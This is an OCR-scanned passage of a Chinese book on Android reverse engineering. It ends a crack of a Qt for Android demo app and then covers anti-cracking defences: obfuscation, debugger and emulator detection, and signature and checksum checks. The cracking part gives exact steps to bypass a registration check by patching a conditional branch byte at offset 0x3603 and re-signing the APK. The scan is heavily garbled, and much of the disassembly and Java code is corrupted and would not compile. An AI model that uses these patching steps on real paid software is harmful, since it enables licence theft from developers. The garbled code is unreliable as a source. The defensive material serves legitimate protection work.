只 有 一 行 “BX PC” 指 令 ， 束 是 跳 转 到 PC 寄存 器 指 同 的 地 址 去 执行 。 


EG 


可 PC 寄存 器 的 值 是 多 少 昵 ? 其实， 它 只 是 一 个 桩 函数 ， 仔 细 碍 看 IDA 
Pro 中 有 反 汇 编 代码 ， 会 发 现 有 很 多 一 样 的 函数 。IDA Pro 非 常 强大 ， 能 够 
分 析出 PC 寄存 器 将 跳 转 到 何 处 去 执行 。 将 鼠标 在 sub_5510 函 数 名 称 上 点 
击 一 下 ， 会 发 现下 面 有 一 个 函数 的 交叉 引用 已 经 高 竞 显 示 该 函数 被 
sub_5510 调 用 过 ， 如 图 9-27 所 示 。 


-text: 
i-text: 
-text: 
-text: 
-text: 
-text: 
:88885512 ; End of function sub 5516 
|.text: 
-text: 
-text: 
-text: 
-text: 
-text: 
-text: 
本 
-text: 
-text: 
|-text : 


tnut= 


-text 


幅 ， 








686868685518 

8868685518 sub _ 5518 ; CODE XREF: MainWindow: :MainWindow(QWidget x*)+6CTp 
8868685516 ; MainWindow: :MainWindow(QWidget x*)+6CTp 

8868685518 BX PC 

HS = 

88885512 ALIGN 4 


68885512 

86685514 CODE32 

66868685514 

00805514 ; =============== SUBROUT I NE ======================================= 

886885514 

0068860905514 ; httributes: noreturn 

66685514 

6868885514 sub_5514 ; CODE XREF: sub 55161j 

66685514 LDR R12, =(_ZN7Q0bject7?connectEPKS_PKCS1_S3_ N20Qt14ConnectionTypeE - G8x5528) 
8989695518 ADD Pes RTIZ, PC ; QObject::connect(Q0bject constax,char constx,Q0bject ， 


68885518 ; End of function sub_5514 
nnnncc1Q 


图 9-27 IDA Pro 强 大 的 分 析 功 能 


下 面 来 看 onButtonclicked() 方 法 的 代码 。 它 的 代码 很 简单 ， 限 于 篇 
笔者 就 不 再 详细 分 析 了， 直接 帖 出 关键 部 分 代码 。 


wo 


“text: 


‘text 


QObject::connect() 一 样 ，IDA Pro 已 经 为 它们 给 出 了 交叉 引用 的 注释 。 从 
上 面 的 反 汇 编 代 码 不 难看 出 ， 指 令 “BMI 


:000035F0 
:000035F0 
:000035F0 


:00003600 
:00003602 
:00003604 
:00003606 
:00003608 
:0000360A 
:0000360C 
:0000360E 
:00003610 
:00003614 
:00003616 
:00003618 
:0000361A 
:0000361C 
:0000361E 


:0000365C loc_365C 


:0000365C 
:0000365E 
:00003660 
:00003662 
:00003664 
:00003666 
:00003668 
:0000366C 
:0000366E 
:00003670 
:00003672 
:00003674 
:00003676 


:0000368E 


:000036BA 


000036BC 
:000036BC 


' 


' 


MainWindow: :onButtonclicked (void) 
EXPORT _ZNlOMainWindowlSonButtonclickedEv 
_ZNlOMainWindowlS5onButtonclickedEv 


LSLS 
BMI 
LDR 
LDR 
ADD 
MOVS 
ADD 
MOVS 
BL 
LDR 
ADD 
MOVS 
ADD 
MOVS 
BL 


LDR 
LDR 
ADD 
MOVS 
ADD 
MOVS 
BL 


ADD 
POP 


RO, R1, #0x1F 

106. 3658 

RS5, [R37R2)] ; MainWindow: :staticMetaObject 
R2, =(aTip - 0x3610) 

RO, SP, #0x30+var_14 


RS 

R22; BC “fy" 

R3, #0 

sub_52B0 ;tr 

R2, =(aUnregisterVers - 0x361E) 

RO, SP, #0x30+var_18 

取 寺 六 站 5 

R2, PC ; "Unregister version!" 
R3,， #0 

sub_52B0 hy 


; CODE XREF: MainWindow: :onButtonclicked (void)+121j 


RS:, [R37R2] ; MainWindow: :staticMetaObject 
R2, =(aTip =- 0x3668) 

RO, SP, #0x30+var_20 

Rl RS 

R2, PC S Eig 

R3, #0 

Sub 52B0 忒 七 站 

R2, =(aThanksForYourR - 0x3676) 

RO, SP, #0x30+var_24 

有 有 5 

R2, PC ; "thanks for your registration!" 
R3, #0 

sub_52B0 i 

sub_52C0 ;QMessageBox: :information 


SP, SP, #0x24 
{R4,R5, PC} 


End of function MainWindow: :onButtonclicked (void) 


代码 中 tr(0) 与 QMessageBox::information() 的 分 析 方 法 与 前 面 


loc_365C” 是 程序 的 破解 关键 


点 。BMI 指 令 的 作用 是 判断 比较 结果 是 否 为 负数 〈 即 CPSR 寄 存 器 的 N 位 
为 1 ) 时 进行 跳 转 。 比 较 的 结果 来 源 于 上 一 条 指令 “LSLS  R0, Rl 
#0x1F”， 对 于 一 个 32 位 的 数 来 说 ， 左 移 31 位 的 作用 是 检查 数 的 最 低位 是 
售 为 1， 如 果 为 1， 则 设置 符号 位 时 为 负数 ， 即 BMI 指 令 会 满足 跳 转 条 
件 ， 人 否则 代码 顺序 癌 下 执行 。 

破解 该 程序 就 是 要 将 “BMI loc_365C” 修 改 成 “B loc_365C” 无 条 件 跳 
转 。 那 怎么 修改 呢 ? 这 需要 我 们 对 ARM 指 令 集 的 字 节 码 有 所 了 
解 。“BMI loc_365C? 对 应 的 字 节 码 为 "2B D4”， 其 中 2B 为 基于 当前 地 址 
以 2 字 节 为 单位 的 位 置 偏 移 ，D4 就 是 B(X) 的 指令 Opcode，X 为 指令 条 件 
人 码 ， 如 EQ、NE、MI 等 。B 指 令 的 Opcode 为 E0， 因 此 ， 我 们 只 需 将 “2B 
D4” 改 为 “2B E0” 即 可 。 使 用 C32asm 打 开 libqtandroidapp.so， 修 改 文件 偏 
移 0x3603 处 的 D4 为 E0， 保 存 后 退出 。 将 修改 后 的 libqtandroidapp.so 使 用 
解压 缩 工具 导入 到 Qtandroidapp.apk 文 件 中 ， 重 新 签名 后 在 AVD 中 安装 
并 运行 ， 点 击 “ 执 行 功能 ”按钮 ， 此 时 会 弹出 感谢 您 注册 的 提示 ， 如 图 9- 
28 所 示 ， 程 序 完美 地 破解 了 。 
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图 9-28 ”破解 后 的 Qtandroidapp 运 行 效果 





破解 Qt for Android 程 序 完 全 是 对 so 动态 库 操 刀 ， 其 破解 难度 比 Java 
与 C# 开 发 的 Android 程 序 要 高 很 多 ， 不 过 此 类 的 商业 软件 相对 来 说 比较 


少见 。 


9.8 ”本章 小 结 


本 章 主 要 介绍 了 Android 了 商业 软件 常用 的 一 些 保护 手法 ， 并 给 出 了 
相应 的 破解 思路 与 方法 。 本 章 的 每 个 小 节 都 通过 实例 破解 的 方式 ， 回 读 
者 展示 了 整个 解密 过 程 。 读 者 在 实际 操作 的 过 程 中 ， 要 不 断 的 总 结 ， 通 
过 逆向 思维 的 方式 找到 反 人 破解 的 方法 ， 来 进一步 的 加 强 自 映 软件 的 保 
护 。 





第 10 音 Android 程序 的 反 破 解 技 
术 


对 于 软件 开 太 人 员 来 说 ， 最 痛 百 的 事 英 过 于 自己 花费 大 量 的 时 间 与 
精力 ， 对 对 天 兰 并 了 大 半年 才 完 成 的 项 目 ， 却 在 短 时 间 内 被 人 破解 了 。 
如 何 防止 软件 被 人 反 编 译 ， 保 证 软件 的 核心 代码 不 被 人 唱 历 ， 我 想 这 应 
该 是 作为 Android 软 件 开发 者 的 您 最 关心 的 事 吧 ! 

由 于 一 些 客观 原因 ，Android 收 费 软件 在 国内 几乎 很 难 存活 ， 
Android 软 件 的 盘 利 模式 多 是 采用 免费 发 布 加 广 告 展 示 来 获取 广告 收 
入 。 免 费 发 布 的 软件 没有 任何 的 授权 访问 机 制 来 控制 ， 都 是 直接 暴露 在 
互联 网 上 的 ， 任 何 一 个 想 要 逆 同 分 析 该 软件 的 人 ， 都 可 以 从 网 上 直接 下 
载 到 apk 文 件 。 既 然 无 法 从 软件 的 肥 布 渠道 保证 其 安全 性 ， 那 残 只 能 从 
软件 代码 本 刁 着 手 了 。 

回想 一 下 逆 癌 Android 软 件 的 步骤 : 首先 是 对 其 进行 反 编 译 ， 然 后 
古 阅 读 肥 汇编 代码 ， 如 果 有 必要 还 会 对 其 进行 动态 调试 ， 找 到 突破 口 后 
注入 或 直接 修改 反 汇编 代码 ， 最 后 重新 编译 软件 进行 测试 。 整 个 过 程 可 
分 为 反 编 译 、 静 态 分 析 、 动 态 调试 、 重 编译 等 4 个 环节 ， 本 章 将 从 这 4 个 
环节 出 发 ， 介 绍 如 何在 每 个 环节 中 保护 自己 的 软件 。 
































10.1 对 抗 反 编 译 


对 抗 反 编译 是 指 apk 文 件 无 法 通过 反 编 译 工 具 〈 如 ApkTool、 
BakSmali、dex2jar) 对 其 进行 反 编 译 ， 或 者 反 编 译 后 无 法 得 到 软件 正确 
的 反 汇 编 代码 。 


10.1.1 如 何 对 抗 反 编译 工具 


对 抗 反 编 译 工具 的 思路 是 : 寻找 反 编 译 工具 在 处 理 apk 或 dex 文 件 时 
的 缺陷 ， 然 后 在 自己 的 软件 中 加 以 利用 ， 让 反 编 译 工 具 处 理 这 些 “ 特 
制 ” 的 apk 文 件 时 抛 出 异常 而 反 编译 失败 。 这 样 编 写 出 来 的 软件 能 够 在 手 
机 上 正常 的 安装 使 用 ， 但 在 反 编 译 工 具 的 眼 里 却 是 一 个 “畸形 ”文件 。 

那 如 何 碍 找 反 编译 工具 的 缺陷 呢 ? 笔者 总 结 了 一 下 ， 有 如 下 两 种 方 
式 : 

1. 阅读 反 编 译 工 具 源 码 

目前 大 多 数 Android 软 件 的 反 汇 编 工具 都 是 开源 的 ， 这 就 使 得 我 们 
可 以 非常 方便 地 通过 阅读 它们 的 源码 来 查找 缺陷 。 查 找 的 思路 可 以 根据 
apk 文 件 的 处 理 环 节 来 展开 ， 例 如 资源 文件 处 理 、dex 文 件 校 验 、dex 文 
件 类 代码 解析 等 ， 但 通常 情况 下 ， 反 编译 工具 在 发 布 前 都 经 过 多 次 测 
试 ， 要 想 找 出 代码 的 缺陷 非常 困难 ， 并 且 分 析 此 类 软件 的 代码 ， 本 号 就 
需要 分 析 人 员 具 有 较 强 的 代码 阅读 与 理解 能 力 ， 因 此 ， 这 种 方法 具体 实 
施 起 来 比较 困难 。 

2. 压力 测试 

比 起 阅读 反 汇 编 工具 的 源码 ， 这 种 方法 的 思路 就 显得 简单 多 了 ， 而 
且 实 施 起 来 也 非常 的 容易 。 通 党 的 做 法 是 : 收集 大 量 的 apk 文 件 (数量 
可 以 是 成 百 上 干 〉 存 放 进 一 个 目录 ， 编 写 脚 本 或 程序 调用 反 编 译 工 具 对 



































目录 下 的 所 有 apk 文 件 进行 反 编 译 。 不 同 的 软件 从 大 小 、 内 容 到 结构 组 
织 都 不 尽 相 同 ， 反 编译 工具 在 处 理 它们 时 有 可 能 会 出 现 异常 。 这 很 好 理 
解 ， 反 编译 工具 也 是 人 写 的 ， 既 然 是 人 写 的 ， 在 处 理 apk 文 件 时 ， 就 有 
可 能 出 现 考虑 不 当 或 处 理 错误 的 时 候 ， 我 们 可 以 从 反 编译 时 的 出 错 信 息 
中 ， 碍 找 反 编译 工具 的 缺陷 ， 然 后 在 软件 中 加 以 利用 。 











10.1.2 ”对 抗 dex2jar 





大 多 数 分 析 Android 程 序 的 人 不 喜欢 阅读 smali 反 汇编 代码 ， 因 为 它 
们 语法 怪异 、 上 汲 难 懂 、 框 架 混 乱 ， 相 比 之 下 ， 使 用 dex2jar 将 dex 文 件 
转换 为 jar 后 ， 通 过 jd-gui 查 看 其 Java 代 人 码 可 以 获得 更 好 的 反 汇编 体验 。 
因此 ，dex2jar 应 该 是 最 有 必要 对 抗 的 反 汇 编 工 具 之 一 ， 笔 者 决定 对 它 进 
行 一 次 压力 测试 。 

笔者 测试 的 dex2jar 版 本 为 0.0.7.8， 在 测试 样本 的 文件 夹 中 编写 一 段 
脚本 程序 自动 调用 dex2jar。 笔 者 使 用 了 Windows 的 批 处 理 ， 编 写 的 代码 


如 下 : 
for %%i in (*.apk) do dex2jar %%1 


将 这 行 代码 保存 为 bat 文 件 后 ， 打 开 命 令 提 示 符 ， 然 后 运行 脚本 ， 
最 终 在 反 编 译 一 个 样本 时 出 现 了 错误 ， 和 输出 的 错误 信息 如 下 《样本 程序 
的 名 称 笔者 已 经 隐 去 ) : 





version:0.0.7.8-SNAPSHOT 
3 [main] INFO pxb.android.dex2jar.v3.Main - dex2jar xxx.apk -> xxx.apk. 
dex2jar.jar 
1671 [main] ERROR pxb.android.dex2jar.reader.DexFileReader - Fail on class 
java.lang.RuntimeException: Error in method: [Lsun/security/util/BitArray;. 
position(I)I] 
at pxb.android.dex2jar.reader .DexFileReader.visitMethod (DexFileReader. 
java:499) 
at pxb.android.dex2jar.reader .DexFileReader.acceptClass (DexFileReader. 
java:302) 
at pxb.android.dex2jar.reader .DexFileReader .accept (DexFileReader .java:177) 
at pxb.android.dex2jar.v3.Main.doData (Main.java:78) 
at pxb.android.dex2jar.v3.Main.doFile(Main.java:120) 
at pxb.android.dex2jar.v3.Main.main(Main.java:64) 
Caused by: java.lang.RuntimeException: Not support Opcode: [0x00d9]=RSUB_INT 
_LIT8 yet! 
at pxb.android.dex2jar.v3.V3CodeAdapter.visitInIinsn(V3CodeAdapter. 
java:824) 
at pxb.android.dex2jar.reader .DexOpcodeAdapter .visit (DexOpcodeAdapter. 
java:321) 
at pxb.android.dex2jar.reader.DexCodeReader .accept (DexCodeReader. 
java:314) 
at pxb.android.dex2jar.reader .DexFileReader.visitMethod (DexFileReader. 
java:497) 


..5 more 


使 用 jd-gui 打 开 生 成 的 jar 文 件 ， 也 无 法 查看 到 该 文件 的 Java 代 码 ， 
看 来 dex2jar 在 处 理 这 个 apk 文 件 时 存在 缺陷 。 从 错误 的 提示 来 看 ， 应 该 
是 dex2jar 在 解析 dex 文 件 时 过 到 了 不 支持 的 Dalvik 指 令 
RSUB_INT_LIT8， 错 误 的 信息 中 同时 打印 出 了 dex2jar 相 应 的 源码 位 
置 ， 位 于 DexFileReader.java 文 件 的 第 499 行 。RSUB_INT_LIT8 指 令 的 作 
用 是 逆 减 法 操作 《〈 即 第 2 个 操作 数 减 去 第 1 个 操作 数 ) ， 既 然 dex2jar 遇 到 
该 指令 时 会 发 生 异 常 ， 我 们 只 需 在 编写 软件 时 让 代码 生成 该 指令 即 可 。 
从 错误 信息 中 可 以 看 出 ， 发 生 异 常 的 代码 为 sun.security.util.BitArray 
类 的 position0 方 法 ， 这 个 类 是 jdk 提 供 的 ， 我 们 直接 查看 BitArray 的 源 
码 ， 代 码 如 下 : 





public class BitArray { 


none 


private static int positionl(int idx) { // bits big-endian in each unit 
return 1 << {BITS PER UNIT - 1 - (idx % BITS PER UNIT)); 
} 


} 

这 个 position0 方 法 的 代码 非常 简单 ， 将 它 的 代码 加 入 到 我 们 的 软件 
中 ， 是 否 就 可 以 让 dex2jar 反 编译 出 错 呢 ? 经 过 笔者 的 实验 ， 发 现 的 确 如 
此 ， 具 体 的 代码 读者 可 以 参看 本 小 节 实 例 Antidex2jar 工 程 。 


10.2 ”对 抗 静 态 分 析 


不 要 指望 反 编译 工具 永远 无 法 编译 你 的 软件 ， 上 一 节 介 绍 的 方法 只 
对 dex2jar-0.0.7.8 版 本 有 效 ， 最 新 版 本 的 dex2jar 己 经 能 够 很 好 的 处 理 
RSUB_INT_LIT8 指 令 了 。 因 此 ， 我 们 需要 想 其 他 办 法 来 防止 软件 遭 到 
破解 。 


10.2.1 ”代码 混淆 技术 


使 用 Native 代 码 代 蔡 Java 代 码 是 很 好 的 代码 保护 手段 ， 因 为 大 部 分 
人 还 不 具备 自由 分 析 Native 代 码 的 能 力 。 但 如 果 您 是 一 个 纯 Java 的 程序 
员 ， 不 具备 C/C++ 编程 基础 ， 就 只 能 考虑 使 用 代码 混 漆 技术 了 。Java 语 
言 编 写 的 代码 本 里 就 很 容易 被 反 编译 ，Google 很 早 就 意识 到 了 这 一 点 ， 
在 Android 2.3 的 SDK 中 正式 加 入 了 ProGuard 代 码 混 消 工具 ， 开 发 人 员 可 
以 使 用 该 工具 对 自己 的 代码 进行 混 消 。 

ProGuard 提 供 了 压缩 CShrinking) 、 混 淆 〈Obfuscation ) 、 优 化 

COptimition ) Java 代 码 以 及 反 混 消 栈 跟踪 (ReTrace) 的 功能 。 使 用 

ProGuard 前 需要 编写 混 消 配 置 文件 ， 使 用 Eclipse+ADT 开 发 Android 应 用 
程序 ， 会 默认 生成 project.properties 与 proguard.cfg 两 个 文件 ， 要 想 使 用 
ProGuard 混 消 软 件 ， 需 要 手动 的 配置 它们 ， 首 先 需要 在 project.properties 
文件 中 如 下 添加 一 行 代码 。 

proguard.config=proguard.cfg 

接着 在 proguard.cfg 文 件 中 设置 需要 混淆 与 保留 的 类 或 方法 。 一 个 上 典 
型 的 配置 文件 内 容 如 下 : 














-optimizations !code/simplification/arithmetic, Icode/simplification/cast, 
1!field/*, Iclass/merging/* 

-optimizationpasses 5 

-allowaccessmodification 


-dontpreverify 


# The remainder of this file is identical to the non-optimized version 
# of the Proguard configuration file (except that the other file has 
# flags to turn off optimization). 


-dontusemixedcaseclassnames 
-dontskipnonpubliclibraryclasses 
-verbose 


-keepattributes *Annotation* 
-keep public class com.google.vending.licensing.ILicensingService 
-keep public class com.android.vending.licensing.ILicensingService 


# For native methods, see 
http://proguard.sourceforge.net/manual/examples.html#native 
-keepclasseswithmembernames class * { 

native <methods>; 


# keep setters in Views so that animations can still work. 


# see http://proguard.sourceforge.net/manual/examples.html#beans 


-keepclassmembers public class * extends android.view.View { 
valid set* (** 人 yp 
we 

} 


# We want to keep methods in Activity that could be used in the XML attribute 
onClick 
-keepclassmembers class * extends android.app.Activity ({ 

public void *(android.view.View); 


} 


# For enumeration classes, see 
http://proguard.sourceforge.net/manual/examples.html#enumerations 
-keepclassmembers enum * { 

public static **[] values (); 

public static ** valueOf (java.lang.Sstring); 


-keep class * implements android.os.Parcelable { 
public static final android.os.ParcelablesCreator *; 


} 


-keepclassmembers class **.RS* { 
PUubLie ‘Static «filelds>y: 


} 


# The support library contains references to newer platform versions. 
# Don't warn about those in case this app is linking against an older 
# platform version. We know about them, and they are safe. 


-dontwarn android.support.** 

ProGuard 默 认 情 况 下 会 对 class 文 件 中 所 有 的 类 、 方 法 以 及 字段 进行 
混 请 ， 经 过 混 消 的 类 已 经 * 面 无 全 非 ?> 了 ， 这 种 情况 通常 会 造成 Android 
程序 运行 时 找 不 到 特定 的 类 而 殷 出 异常 ， 解 决 的 方法 是 根据 异常 信息 的 
内 容 ， 找 到 出 现 异常 的 类 ， 然 后 在 配置 文件 中 使 用 “-keep ”class” 选 项 添 
加 进来 ，ProGuard 具 体 的 配置 方法 笔者 就 不 介绍 了 ， 网 上 有 很 多 文章 对 
其 介绍 的 很 详细 。 如 图 10-1 所 示 ， 经 过 混淆 过 的 代码 (实例 为 
DroidKongFu 变 种 病毒 的 代码 ， 本 书 将 在 第 12 章 详细 分 析 它 ) ， 使 用 jd- 
gui 分 析 起 来 同样 会 非常 吃力 。 
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图 10-1 ”使 用 jd-gui 阅 读 混淆 过 的 代码 





10.2.2 NDK 保 护 


如 果 读 者 熟悉 使 用 Android NDK 编 写 Native 代 码 ， 那 么 在 自己 的 项 
目 中 就 要 多 多 使 用 它 。 在 前 面 的 革 市 中 ， 我 们 兽 多 次 介绍 过 Android 
NDK 编 写 的 程序 ， 笔 者 其 至 花 了 两 革 的 内 容 来 讲解 如 何 逆 回 它 们 。 相 信 
读者 对 其 中 的 内 容 印 象 深刻 吧 。 逆 各 NDK 程 序 的 汇编 代码 本 里 就 是 一 件 
极其 枯燥 与 艰难 的 事情 ， 能 坚持 下 来 的 人 少 之 又 少 ， 没 有 汇编 语言 基础 
的 读者 则 更 是 极 易 放弃 。 

如 何 强 而 有 效 地 使 用 Native 代 码 来 保护 自己 的 软件 ， 就 要 仁者 见 
仁 ， 智 者 见 乔 了。 软件 的 保护 强度 一 方面 与 开发 人 员 的 C/C++ 编程 水 平 
有 关 ， 这 里 的 编程 水 平 不 是 指 实现 软件 功能 的 能 力 ， 而 是 指 开 发 人 员 目 

















号 对 软件 安全 的 了 解 ， 如 功能 字符 串 加 密 、 代 码 加 密 等 ， 对 于 从 事 过 
Linux 平 人 台 商 业 软 件 开 发 的 作者 来 说 ， 编 写 Native 代 码 来 保护 自己 的 代码 
应 该 不 是 很 难 的 事情 ， 因 为 Linux 上 那 套 API 在 NDK 中 可 以 原原本本 的 拿 
来 使 用 ; 男 一 方面 ， 使 用 Native 代 人 码 实现 软件 功能 有 点 舍 近 求 远 的 感 
觉 ， 往 往 几 行 Java 代 人 码 就 能 搞定 的 事情 ， 使 用 Native 代 码 却 需要 几 十 行 
甚至 更 多 的 代码 才能 实现 ， 这 让 很 多 开发 人 员 感 到 纠结 ， 除 了 代码 量 的 
增加 ， 还 有 调试 Native 代 码 的 难度 也 比 调试 Java 代 码 高 出 许多 ， 开 发 成 
本 的 增加 势必 会 让 很 多 开发 人 员 难 以 接受 ， 因 此 ， 在 代码 安全 与 开发 周 
期 上 还 需要 找到 一 个 平衡 点 。 

本 小 市 不 提供 实例 代码 讲解 ， 读 者 可 以 参考 本 书 9.6 小 节 重 启 验证 
的 例子 ， 在 它 的 基础 上 进行 功能 扩展 ， 实 现 更 多 保护 。 


10.2.3 ”外 过 保护 


外 这 保护 是 一 种 代码 加 密 技术 ， 在 Windows 平 台 的 软件 中 广泛 被 使 
用 。 外 壳 保 护 正 如 其 名 称 一 样 ， 给 软件 套 上 一 层 “ 外 壳 ”， 经 过 外 壳 保 护 
的 软件 ， 展 现在 分 析 人 员 面 前 的 是 外 壳 的 代码 ， 因 此 ， 从 很 大 程序 上 保 
护 了 软件 被 人 破解 。 

Java 代 码 由 于 其 语言 自身 的 特殊 性 ， 没 有 外 壳 保 护 这 个 概念 ， 只 能 
通过 混 消 方 式 对 其 进行 保护 。 外 壳 保 护 重 点 针对 使 用 Android NDK 编 写 
的 Native 代 码 ， 逆 问 Native 代 人 码 本 里 就 已 经 够 困难 了 ， 如 果 添 加 了 外 序 
保护 则 更 是 难 上 加 难 ， 目 前 已 知 可 用 于 ARM Linux 内 核 程序 的 加 壳 工 具 
只 有 upx， 它 是 一 球 开 源 的 加 过 软件 ， 文 持 多 平台 、 多 类 型 的 文件 加 
壳 ， 其 主页 为 http://upx.sourceforge.net/。 截 止 到 笔者 编写 完 本 章 时 ， 该 
工具 最 新 版 本 为 3.08， 支 持 的 最 高 ARM 指 令 集 版 本 为 4， 由 于 Android 
NDK 使 用 的 是 v5 与 v7-a 版 本 的 指令 集 ， 因 此 ， 该 工具 目前 还 无 法 在 
Android 系 统 中 正常 工作 ， 笔 者 相信 在 不 久 的 将 来 ， 它 一 定 能 应 用 到 






































Android 软 件 中 来 。 


10.3 “对抗 动态 调试 


如 果 您 认为 目 己 编写 的 代码 己 经 足够 对 付 别 人 静态 分 析 了 ， 可 以 考 
虑 在 代码 中 加 入 动态 调试 检测 ， 让 破解 者 无 从 对 自己 的 软件 下 手 。 


10.3.1 检测 调试 器 


动态 调试 使 用 调试 器 来 挂 钧 软件 ， 获 取 软 件 运 行 时 的 数据 ， 我 们 可 
以 在 软件 中 加 入 检测 调试 器 的 代码 ， 当 检测 到 软件 被 调试 器 连接 时 ， 中 
止 软件 的 运行 。 

首先 ， 在 AndroidManifest.xml 文 件 的 Application 标 签 中 加 入 
android:debuggable="false" 计 程序 不 可 调试 ， 这 样 ， 如 有 果 别 人 想 调 试 该 
程序 就 必然 会 修改 它 的 值 ， 我 们 在 代码 中 检查 它 的 值 来 判断 程序 是 否 被 
修改 过 ， 代 码 如 下 : 


if ((getaApplicationInfol().flags &= 
ApPPlLicationInfo.FLAG_DEBUGGABLE) != 0){ 
Log.e("com.droider .antidebug"， "程序 被 修改 为 可 调试 状态 ")， 
android.os.Process.killProcess (androild.os .Process .myPid!()); 
} 
ApplicationInfo.FLAG_DEBUGGABLE 对 应 


android:debuggable="true"， 如 果 该 标志 被 置 位 ， 说 明 程 序 已 经 被 修改 ， 
这 个 时 候 束 可 以 果断 地 中 止 程序 运行 。 

男 外 ，Android SDK 中 提供 了 一 个 方法 方便 程序 员 来 检测 调试 器 是 
售 已 经 连接 ， 代 码 如 下 : 

android.os.Debug.isDebuggerConnected{() 

如 果 方 法 返回 真 ， 说 明 调 试 器 已 经 连接 。 我 们 可 以 随机 地 在 软件 中 
插入 这 行 代码 来 检测 调试 器 ， 碰 到 有 调试 器 连接 就 果断 地 结束 程序 运 
行 。 


检测 调试 器 的 完整 代码 读者 可 以 参看 本 书 配 套 源 代码 中 本 小 节 的 
AntiDebug 工 程 。 


10.3.2 ”检测 模拟 器 


软件 发 布 后 会 安装 到 用 户 的 手机 中 运行 ， 如 果 发 现 软 件 运 行 在 模拟 
器 中 ， 很 显然 不 合 常 理 ， 可 能 是 有 人 试图 破解 或 分 析 它 ， 这 种 情况 我 们 
必须 予以 阻止 。 

模拟 器 与 真实 的 Android 设 备 有 着 许多 差异 ， 我 们 可 以 在 命令 提示 
符 下 执行 “adb shell getprop” 查 看 并 对 比 它们 的 属性 值 ， 经 过 对 比 发 现 ， 
有 如 下 几 个 属性 值 可 以 用 来 判断 软件 是 否 运 行 在 模拟 器 中 : 

ro.product.model: 该 值 在 模拟 器 中 为 sdk， 通 常 在 正常 手机 中 它 的 
值 为 手机 的 型 号 。 

ro.build.tags: 该 值 在 模拟 器 中 为 test-keys， 通 常 在 正常 手机 中 它 的 
值 为 release-keys。 

ro.kernel.qemu: 该 值 在 模拟 器 中 为 1， 通 常 在 正常 手机 中 没有 该 属 





性 。 
这 些 属性 的 差异 可 以 用 来 判断 软件 是 否 运 行 在 模拟 器 中 ， 笔 者 以 检 
查 ro.kernel.gqemu 属 性 为 例 ， 编 写 检 测 模 拟 器 的 代码 如 下 : 


boolean isRUuNnningInEmualtor() { 
boolean qemuKernel = false; 
Process process = null,; 
DataOutputSstream os = null; 
tryt{ 
process = Runtime.getRuntime() .exec("getprop ro.kernel .gqemu"); 
/ /执行 getprop 
os = new DataOutputSstream(process.getOoutputStream());// 获 取 输 出 流 
BufferedReader in = new BufferedReader!( 
new InputSstreamReader (process .getIinputStream(),"GBK")); 
os.writeBytes ("exit\n"),; /1 执行 退出 
os.flush(); /7 刷新 输出 流 
process .waitFor(); 
qemuKernel = (Integer.valueOof (in.readLine()) == 1); // 判 断 
ro.kernel .qemu 必 性 值 是 否 为 1 
Log.d("com.droider .checkqemu",， "检测 到 模拟 器 ;:" + qemuKernel); 
} catch (Exception e){ 
qemuKernel = false; // 出 现 异常 ， 可 能 是 在 手机 中 运行 


Log.d("com.droider.checkgemu", "run failed" + e.getMessage()); 
} Finally it 
tryt{ 
LE Ou b= 5 
os.close(); 


} 
process.destroy(); 
} catch (Exception e) { 


} 
Log.d("com.droider.checkqemu", "run finally"); 
} 


return gqemuKernel; 


检测 模拟 器 的 完整 代码 读者 可 以 参看 本 书 配 套 源 代码 中 本 小 节 的 
CheckQemu 工 程 。 


10.4 ”防止 重 编译 





反 和 破解 的 最 后 一 个 环节 是 防止 重 编译 。 破 解 者 可 能 注入 代码 来 分 析 
我 们 的 软件 ， 也 可 能 修改 软件 逻辑 直接 破解 ， 不 管 怎 么 修改 ， 软 件 本 身 
的 一 些 特 性 已 经 改变 了 。 


10.4.1 检查 签名 





每 一 个 软件 在 发 布 时 都 需要 开发 人 员 对 其 进行 签名 ， 而 签名 使 用 的 

密 钥 文件 是 开发 人 员 所 独 有 的 ， 破 解 者 通常 不 可 能 拥有 相同 的 密 钥 文件 

(和 密 钥 文件 被 盗 除 外) ， 因 此 ， 签 名 成 了 Android 软 件 一 种 有 效 的 号 份 
标识 ， 如 末 软 件 运行 时 的 签名 与 自己 发 布 时 的 不 同 ， 说 明 软 件 被 算 改 
过 ， 这 个 时 候 我 们 就 可 以 让 软件 中 止 运行 。 

Android SDK 中 提供 了 检测 软件 签名 的 方法 ， 可 以 调用 
PackageManager 类 的 getPackagelInfo() 方 法 ， 为 第 2 个 参数 传 入 
PackageManager.GET_SIGNATURES， 返 回 的 PackageInfo 对 象 的 
signatures 字 段 就 是 软件 发 布 时 的 签名 ， 但 这 个 签名 的 内 容 比 较 长 ， 不 适 
合 在 代码 中 做 比较 ， 可 以 使 用 签名 对 象 的 hashCode() 方 法 来 获取 一 个 
Hash 值 ， 在 代码 中 比较 它 的 值 即 可 ， 获 取 签 名 Hash 值 的 代码 如 下 : 











public int getSignature(String PackageName) ({ 
PackageManager pm = this.getPackageManager () ; 
PackageInfo pi = null; 
Ln Sdc = Os 
try { 
pi = pm.getPackageInfo (packageName, PackageManager .GET_ SIGNATURES),; 
Signature[] s = pi.signatures; 
sig = s[0] .hashCode(); 
} catch (Exception el) 1{ 
Sig = 0; 
el.printStackTrace(); 
} 


return sig; 


} 

笔者 使 用 Eclipse 自 带 的 调试 版 密 钥 文件 生成 的 apk 文 件 的 Hash 值 为 
2071749217， 在 软件 启动 时 ， 判 断 其 签名 Hash 是 否 为 这 个 值 ， 来 检查 软 
件 是 否 被 算 改 过 ， 相 应 的 代码 如 下 : 


int sig = getSignature("com.droider.checksignature"); 
if (sig = COEFAS9SLT) A 
text info.setTextColor {Color .RED); 
text_info.setText ("检测 到 程序 签名 不 一 致 ， 该 程序 被 重新 打包 过 ! ") ; 
} else { 
text_ info.setTextColor (Color .GREEN) ; 
text_info .setText(" 该 程序 没有 被 重新 打包 过 ! ") ; 


放生 和 和 


检查 签名 的 完整 代码 读者 可 以 参看 本 书 配 套 源 代码 中 本 小 节 的 
CheckSignature 工 程 。 


10.4.2” 校 验 保护 


重 编译 Android 软 件 的 实质 是 重新 编译 classes.dex 文 件 ， 代 码 经 过 重 
新 编译 后 ， 生 成 的 classes.dex 文 件 的 Hash 值 已 经 改变 。 我 们 可 以 检查 程 
序 安装 后 classes.dex 文 件 的 Hash 值 ， 来 判断 软件 是 否 被 重 打包 过 。 至 于 


Hash 算 法 ，MD5 或 CRC 都 可 以 ，apk 文 件 本 身 是 zip 压 缩 包 ， 而 且 Android 
SDK 中 有 专门 处 理 zip 压 缩 包 及 获取 CRC 检 验 的 方法 ， 为 了 不 徒 增 代 码 
